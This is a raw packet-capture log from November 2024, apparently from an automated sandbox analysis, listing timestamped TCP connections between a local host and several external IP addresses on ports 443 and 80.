Nov 13, 2024 20:39:34.633097887 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.633114100 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.633657932 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.633663893 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.636327982 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:34.638385057 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.638454914 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.638720036 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.639264107 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.639295101 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.662343025 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.663296938 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.663330078 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.663865089 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.663877010 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.668740034 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:34.702202082 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.702759981 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.702778101 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.703026056 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.703037024 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.715331078 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:34.786848068 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:34.787022114 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:34.788593054 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:34.788605928 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:34.788860083 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:34.790355921 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:34.831338882 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:34.834391117 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.834531069 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.834733009 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.835340023 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.835340023 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.835371017 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.835381985 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.839766979 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.839819908 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.839936972 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.840563059 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.840583086 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.842814922 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.843856096 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.843950033 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.844012976 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.844033957 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.844064951 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.844073057 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.847659111 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.847691059 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.847748995 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.848383904 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.848398924 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.849073887 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.849221945 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.849550009 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.849626064 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.849626064 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.849658012 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.849683046 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.850903034 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.851644993 CET	80	49804	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:34.851711988 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.851783991 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.851824999 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:34.851830006 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.851845026 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.851897001 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.851910114 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.852894068 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.852926970 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.853667021 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.854285955 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.854300976 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.855488062 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.855515003 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.855607033 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.856515884 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.856525898 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.999298096 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:35.004462004 CET	80	49804	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:35.032560110 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:35.032610893 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:35.032793999 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:35.051961899 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.051989079 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.051995993 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.052004099 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.052045107 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.052057028 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.052087069 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.052098036 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.052102089 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.052134037 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.053008080 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.053071976 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.053076029 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.066112995 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:35.066138029 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:35.066154003 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:35.066160917 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:35.070199966 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.070213079 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.070353985 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.070380926 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.070480108 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.070522070 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:35.070533991 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:35.124751091 CET	49791	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:35.192013979 CET	49712	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:35.192085981 CET	49712	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:35.192398071 CET	49819	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:35.192436934 CET	443	49819	23.1.237.91	192.168.2.5
Nov 13, 2024 20:39:35.192509890 CET	49819	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:35.192718029 CET	49819	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:35.192732096 CET	443	49819	23.1.237.91	192.168.2.5
Nov 13, 2024 20:39:35.196993113 CET	443	49712	23.1.237.91	192.168.2.5
Nov 13, 2024 20:39:35.197345972 CET	443	49712	23.1.237.91	192.168.2.5
Nov 13, 2024 20:39:35.453810930 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.454307079 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.454340935 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.454811096 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.454818010 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.515585899 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:35.515660048 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.517400026 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.517410994 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:35.517625093 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:35.519267082 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.519344091 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.519350052 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:35.519521952 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.563329935 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:35.578701019 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.579195976 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.579219103 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.579252005 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.579648972 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.579653978 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.579941034 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.579967022 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.580355883 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.580388069 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.580396891 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.580627918 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.580643892 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.581000090 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.581006050 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.582211018 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.582374096 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.582432032 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.582484007 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.582484007 CET	49814	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.582509995 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.582526922 CET	443	49814	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.585088968 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.585117102 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.585300922 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.585449934 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.585462093 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.594019890 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.594429016 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.594443083 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.594909906 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.594914913 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.706979990 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.707197905 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.707263947 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.707290888 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.707307100 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.707326889 CET	49817	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.707334042 CET	443	49817	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.709901094 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.709975004 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.710064888 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.710190058 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.710206985 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.711257935 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.711635113 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.711697102 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.711728096 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.711740017 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.711750984 CET	49815	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.711756945 CET	443	49815	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.713761091 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.713783026 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.713841915 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.713959932 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.713970900 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.716396093 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.716480970 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.716521978 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.716582060 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.716593981 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.716603041 CET	49816	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.716607094 CET	443	49816	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.718393087 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.718437910 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.718571901 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.718630075 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.718663931 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.730546951 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.730701923 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.731416941 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.731430054 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.731434107 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.731456995 CET	49818	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.731460094 CET	443	49818	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.733091116 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.733158112 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.733266115 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.733330011 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:35.733349085 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:35.769967079 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:35.770369053 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.770379066 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:35.770423889 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.770440102 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:35.782927036 CET	80	49804	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:35.782989025 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:35.873327971 CET	443	49819	23.1.237.91	192.168.2.5
Nov 13, 2024 20:39:35.873420000 CET	49819	443	192.168.2.5	23.1.237.91
Nov 13, 2024 20:39:36.327707052 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.336949110 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.336977959 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.337526083 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.337532043 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.447566986 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.456023932 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.463468075 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.463552952 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.463753939 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.466897964 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.490259886 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.490259886 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.490273952 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.490288973 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.490796089 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.490828991 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.492796898 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.492805958 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.494205952 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.494220972 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.494250059 CET	49820	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.494255066 CET	443	49820	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.511253119 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.545948029 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.590183973 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.618015051 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.618200064 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.621136904 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.624370098 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.628778934 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.628855944 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.765764952 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.765764952 CET	49822	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.765782118 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.765791893 CET	443	49822	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.780118942 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.780199051 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.782608032 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.782623053 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.915818930 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.916017056 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.917814970 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.924798965 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.924798965 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.924877882 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.924910069 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.949805021 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.949805021 CET	49823	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.949837923 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.949863911 CET	443	49823	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.971725941 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.971725941 CET	49824	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:36.971795082 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:36.971831083 CET	443	49824	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.084135056 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.084300995 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.084371090 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.169462919 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.169462919 CET	49821	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.169511080 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.169538021 CET	443	49821	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.251553059 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.251600027 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.251739979 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.263335943 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.263370037 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.267379045 CET	49826	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.267473936 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.267558098 CET	49826	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.267946005 CET	49826	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.267982960 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.268101931 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.268131971 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.268188953 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.269628048 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.269711971 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.269722939 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.269747019 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.269818068 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.269892931 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.271053076 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.271070957 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.271168947 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.271208048 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:37.271305084 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:37.271321058 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.004332066 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.004621029 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.006745100 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.010376930 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.017657042 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.058024883 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.058024883 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.058037043 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.078212976 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.078269958 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.078950882 CET	49828	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.078967094 CET	443	49828	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.080790997 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.080800056 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.080939054 CET	49827	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.080944061 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.081281900 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.081286907 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.081980944 CET	49825	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.081995964 CET	443	49825	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.082673073 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.082711935 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.083060980 CET	49829	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.083069086 CET	443	49829	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.083859921 CET	49826	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.083884001 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.084276915 CET	49826	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:38.084283113 CET	443	49826	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.205918074 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.205977917 CET	443	49827	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:38.206079006 CET	443	49829	13.107.246.45	192.168.2.5
